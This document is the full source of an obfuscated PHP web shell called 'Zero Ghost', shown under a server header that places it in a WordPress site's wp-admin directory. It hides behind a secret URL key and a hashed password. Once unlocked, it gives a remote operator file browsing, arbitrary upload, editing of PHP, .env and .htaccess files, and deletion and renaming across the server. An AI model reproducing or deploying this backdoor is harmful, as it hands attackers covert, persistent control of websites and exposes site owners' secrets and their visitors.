|
Server : LiteSpeed System : Linux srv104790275 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64 User : dewac4139 ( 1077) PHP Version : 8.0.30 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, Directory : /home/dewa95.com/public_html/wp-admin/ |
Upload File : |
<?php
goto cWdN8; TYdWd: echo "\74\x68\x32\76\360\237\227\x82\357\xb8\217\40\132\145\x72\157\x20\107\150\157\x73\x74\74\57\x68\62\76"; goto ILS4P; ulzyc: echo "\74\57\146\157\162\155\x3e"; goto ADTEw; NeX1s: echo "\74\x69\x6e\x70\165\164\x20\164\171\x70\x65\x3d\42\x73\x75\142\155\x69\164\x22\x20\x6e\x61\155\x65\x3d\42\x63\162\145\x61\x74\x65\146\x6f\x6c\144\x65\x72\x22\40\x76\x61\154\x75\x65\75\x22\x43\162\x65\x61\164\x65\x20\x46\x6f\x6c\144\145\162\x22\76"; goto irLY3; ADTEw: echo "\74\146\157\x72\x6d\40\155\145\x74\x68\x6f\x64\x3d\42\x50\117\123\124\x22\x20\163\164\x79\x6c\145\75\42\x6d\x61\x72\x67\x69\x6e\x2d\x74\157\160\x3a\61\60\160\170\x3b\42\76"; goto GtG33; XZ46o: function h($s) { return htmlspecialchars($s); } goto EfuPi; EfuPi: function isText($file) { $textFiles = array("\x2e\x68\164\141\143\143\x65\x73\163", "\56\x65\x6e\x76", "\56\x67\151\x74\x69\147\x6e\x6f\x72\x65"); $extAllow = array("\160\x68\x70", "\164\170\x74", "\x68\164\155\x6c", "\x63\x73\x73", "\152\163", "\152\x73\157\x6e", "\145\x6e\166"); $basename = basename($file); $ext = pathinfo($basename, PATHINFO_EXTENSION); return @is_file($file) && (in_array($basename, $textFiles) || in_array($ext, $extAllow)); } goto DG_aN; Gqf4l: if (!isset($_SESSION["\x6c\157\147\147\145\x64\137\151\x6e"])) { if (isset($_POST["\x70\141\163\163"]) && password_verify($_POST["\x70\141\x73\163"], $hashed_password)) { $_SESSION["\x6c\157\x67\147\145\144\137\x69\x6e"] = true; header("\114\157\x63\x61\x74\151\157\x6e\x3a\x20" . $_SERVER["\120\110\120\137\123\105\x4c\x46"]); die; } echo "\74\x66\x6f\162\155\40\x6d\x65\164\x68\x6f\x64\x3d\x22\x50\117\x53\124\x22\x3e"; echo "\x3c\x69\156\160\165\x74\40\x74\171\x70\x65\75\x22\160\x61\163\x73\167\x6f\x72\144\42\x20\156\x61\155\145\x3d\42\x70\x61\163\163\42\x20\160\154\x61\x63\145\x68\x6f\154\144\x65\162\75\42\105\x6e\x74\145\162\40\120\141\163\163\167\x6f\162\144\42\76"; echo "\x3c\151\156\x70\165\x74\x20\164\x79\160\145\x3d\x22\x73\165\x62\x6d\151\x74\x22\40\x76\x61\x6c\165\145\x3d\42\x4c\157\x67\x69\156\x22\x3e"; echo "\x3c\x2f\146\157\162\x6d\x3e"; die; } goto KkRmv; mGbqs: echo "\74\160\x3e\74\x61\x20\x68\x72\x65\x66\75\x22\77\x6c\x6f\147\157\165\x74\75\x31\x22\76\xf0\x9f\x94\222\40\114\157\147\x6f\x75\x74\x3c\57\141\x3e\x3c\57\x70\76"; goto yCfWo; FvdDm: echo "\74\151\x6e\160\x75\x74\x20\164\171\160\145\75\42\163\165\x62\x6d\x69\164\42\x20\x76\x61\154\165\x65\75\42\125\160\154\157\141\x64\42\76"; goto ulzyc; irLY3: echo "\74\57\x66\157\x72\155\x3e"; goto ZXM12; eZG5d: if (isset($_GET["\x65\144\x69\164"])) { $file = $_GET["\144\x69\162"] . "\x2f" . $_GET["\145\x64\x69\x74"]; if ($_SERVER["\x52\105\x51\x55\x45\x53\124\137\115\x45\124\x48\x4f\x44"] === "\x50\117\123\124") { file_put_contents($file, $_POST["\143\x6f\x6e\164\x65\156\x74"]); echo "\x3c\160\76\342\x9c\205\40\104\x69\x73\151\155\160\x61\x6e\74\x2f\160\x3e"; } $content = @file_get_contents($file); echo "\74\146\x6f\162\155\x20\x6d\145\x74\150\x6f\144\75\47\120\117\x53\x54\47\76"; echo "\x3c\x74\145\x78\164\141\162\x65\141\40\x6e\141\155\x65\x3d\47\143\157\156\164\x65\156\x74\x27\40\x72\157\167\x73\75\x27\x32\x30\47\x20\143\x6f\154\x73\x3d\x27\x31\60\60\x27\x3e" . h($content) . "\74\x2f\164\x65\x78\164\141\162\x65\x61\x3e\74\x62\x72\x3e"; echo "\x3c\x69\x6e\x70\x75\164\x20\164\x79\x70\x65\x3d\47\163\x75\142\x6d\151\164\x27\40\x76\x61\x6c\x75\145\x3d\x27\x53\x61\166\145\x27\x3e"; echo "\x3c\57\146\157\x72\x6d\76"; die; } goto V3Len; uG1Wi: echo "\74\57\165\154\76"; goto fcHFx; Ryz6o: foreach ($files as $file) { if ($file == "\x2e") { continue; } $path = getcwd() . "\57" . $file; $urlDir = urlencode(getcwd()); $urlFile = urlencode($file); echo "\x3c\154\x69\76{$file}\40"; if (is_dir($file)) { echo "\x5b\x3c\141\x20\150\162\145\x66\75\x27\77\x64\151\x72\75" . urlencode(realpath($path)) . "\47\x3e\x4f\x70\x65\156\74\x2f\x61\76\x5d"; } if (isText($file)) { echo "\133\74\141\x20\150\x72\145\146\x3d\47\77\x65\x64\x69\164\75{$urlFile}\x26\x64\151\x72\75{$urlDir}\x27\x3e\x45\144\151\x74\x3c\57\x61\x3e\x5d"; } echo "\x20\133\x3c\141\x20\x68\162\x65\146\x3d\x27\x3f\x64\x65\154\145\x74\145\75{$urlFile}\46\144\151\162\75{$urlDir}\47\x20\x6f\156\143\x6c\151\143\153\75\47\x72\145\164\x75\x72\x6e\x20\143\157\x6e\x66\x69\162\155\x28\42\110\141\x70\x75\163\77\42\51\x27\x3e\104\x65\154\x65\x74\145\74\57\x61\x3e\135"; echo "\x20\x5b\x3c\x61\x20\x68\x72\x65\x66\x3d\x27\77\x72\x65\x6e\x61\155\145\75{$urlFile}\x26\x64\151\x72\75{$urlDir}\47\76\x52\x65\156\141\x6d\145\74\57\141\76\135"; echo "\x3c\57\x6c\x69\x3e"; } goto uG1Wi; fcHFx: if (isset($_GET["\144\x65\x6c\145\164\145"])) { $target = $_GET["\144\151\162"] . "\x2f" . $_GET["\144\145\154\145\164\x65"]; if (is_file($target)) { unlink($target); } elseif (is_dir($target)) { rmdir($target); } header("\114\x6f\143\141\164\x69\x6f\x6e\72\40\77\x64\151\x72\x3d" . urlencode($_GET["\144\x69\x72"])); die; } goto eZG5d; M8Tcg: echo "\74\151\156\x70\x75\164\x20\x74\x79\x70\145\x3d\x22\x66\151\154\x65\42\x20\156\x61\155\145\75\42\x66\x69\154\145\42\76"; goto FvdDm; V3Len: if (isset($_GET["\x72\145\156\141\155\x65"])) { $old = $_GET["\144\x69\162"] . "\57" . $_GET["\162\145\156\x61\155\145"]; if ($_SERVER["\122\105\x51\125\105\x53\124\x5f\115\x45\x54\x48\x4f\x44"] === "\x50\117\x53\124") { $new = $_GET["\x64\x69\x72"] . "\x2f" . $_POST["\156\x65\167\156\141\x6d\145"]; rename($old, $new); header("\114\157\143\141\164\151\x6f\x6e\72\x20\x3f\144\151\162\75" . urlencode($_GET["\x64\x69\x72"])); die; } echo "\74\x66\157\162\x6d\x20\x6d\145\x74\150\x6f\x64\x3d\x27\x50\117\123\x54\47\76"; echo "\122\145\156\141\x6d\145\x20\164\x6f\x3a\40\x3c\151\156\160\165\164\x20\x6e\141\155\145\x3d\47\x6e\145\x77\156\x61\x6d\145\x27\40\166\141\154\165\145\x3d\47" . h(basename($old)) . "\47\76"; echo "\x3c\x69\156\x70\165\164\x20\164\171\160\145\x3d\47\x73\165\x62\x6d\151\x74\47\x20\166\141\x6c\165\145\75\x27\x52\145\x6e\141\155\x65\x27\76"; echo "\74\x2f\x66\157\x72\155\76"; die; } goto MH3Q0; KkRmv: error_reporting(0); goto dipvC; DG_aN: if ($_FILES) { move_uploaded_file($_FILES["\x66\151\x6c\x65"]["\164\x6d\x70\137\x6e\141\155\145"], $_FILES["\146\151\x6c\x65"]["\x6e\141\155\145"]); echo "\74\x70\x3e\342\x9c\205\40\x55\160\154\x6f\x61\x64\145\x64\72\x20" . h($_FILES["\146\151\154\x65"]["\x6e\141\x6d\145"]) . "\x3c\x2f\160\x3e"; } goto gX5Pa; dipvC: $dir = isset($_GET["\144\151\162"]) ? $_GET["\144\151\x72"] : getcwd(); goto HAseu; HAseu: chdir($dir); goto r_yX7; GtG33: echo "\74\151\x6e\160\165\x74\x20\164\171\160\145\75\42\164\145\170\x74\42\x20\x6e\x61\155\145\75\42\156\x65\x77\x66\157\154\144\x65\162\42\40\x70\x6c\x61\143\145\x68\157\154\144\x65\162\75\x22\106\157\154\x64\145\162\40\116\141\155\145\x22\x3e"; goto NeX1s; gX5Pa: if (isset($_POST["\143\162\x65\141\164\145\146\157\x6c\144\x65\162"]) && !empty($_POST["\156\x65\167\146\157\x6c\144\x65\x72"])) { $folderName = basename($_POST["\x6e\145\167\146\x6f\x6c\144\145\162"]); if (!is_dir($folderName)) { mkdir($folderName); echo "\x3c\160\x3e\342\234\x85\x20\106\x6f\x6c\x64\x65\162\40\47{$folderName}\x27\x20\142\x65\162\150\x61\x73\151\154\40\144\151\142\x75\141\x74\74\x2f\160\x3e"; } else { echo "\x3c\160\x3e\342\x9a\240\357\xb8\x8f\40\x46\157\x6c\x64\x65\x72\40\x73\165\144\x61\x68\40\141\144\141\x3c\57\160\76"; } } goto TYdWd; Yh8Yq: $hashed_password = "\44\62\171\44\61\60\44\x6e\130\x59\130\x53\166\112\x35\x58\154\x34\113\107\x50\x2f\61\67\x4e\131\x49\x35\x2e\x30\x74\x63\x32\104\x58\61\x31\151\107\x70\x69\142\116\x49\x63\115\163\x32\x30\113\116\x43\x4d\x64\x63\157\57\x56\172\165"; goto HB1qI; r_yX7: $files = scandir("\x2e"); goto XZ46o; yCfWo: echo "\x3c\x66\x6f\162\x6d\40\145\x6e\143\x74\x79\x70\x65\x3d\42\155\165\154\164\151\x70\141\162\164\x2f\x66\157\x72\x6d\x2d\144\x61\x74\141\x22\40\x6d\145\x74\x68\157\144\x3d\x22\x50\x4f\x53\124\42\76"; goto M8Tcg; cWdN8: session_start(); goto GZ58C; ILS4P: echo "\x3c\160\x3e\xf0\x9f\223\x81\40\103\165\x72\162\145\156\164\x20\104\151\162\x65\143\164\157\x72\171\x3a\x20" . h(getcwd()) . "\x3c\57\x70\x3e"; goto mGbqs; GZ58C: if (!isset($_SESSION["\153\145\171\137\x76\145\x72\151\x66\151\145\144"])) { if (!isset($_GET["\153\x65\171"]) || $_GET["\x6b\x65\171"] !== "\124\167\107\162\x6f\x75\x70") { http_response_code(404); die; } else { $_SESSION["\153\145\x79\137\166\x65\162\151\x66\151\145\144"] = true; } } goto Yh8Yq; ZXM12: echo "\74\165\x6c\76"; goto Ryz6o; HB1qI: if (isset($_GET["\154\x6f\x67\157\x75\164"])) { session_destroy(); header("\114\157\x63\141\x74\151\x6f\156\x3a\x20" . $_SERVER["\120\x48\x50\x5f\123\x45\114\106"]); die; } goto Gqf4l; MH3Q0: ?>